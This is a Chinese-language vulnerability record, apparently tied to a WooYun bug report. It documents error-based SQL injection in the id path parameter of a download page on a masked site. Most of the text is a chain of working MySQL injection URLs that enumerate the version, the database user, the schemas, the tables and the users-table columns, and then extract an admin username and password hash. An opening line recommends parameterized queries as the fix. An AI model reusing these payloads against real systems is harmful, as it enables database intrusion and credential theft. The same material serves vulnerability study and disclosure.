http://www.wooyun.org/bugs/wooyun-2010-01666
之前想找个测试环境,没想到这里就有,可以测试一下,仅作记录。从下面的请求看,路径中的 id 值未经过滤就被拼接进 SQL 语句,而且看起来数据库报错会回显到页面;修复应改用参数化查询,并关闭对外的错误回显。
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
/data0/htdocs/leqi_new/app/myapp.php

或者
/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/ leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********limit依次递归爆库**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test
/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users
/**********limit依次递归爆字段名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 341 351 361
/**********爆数据**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd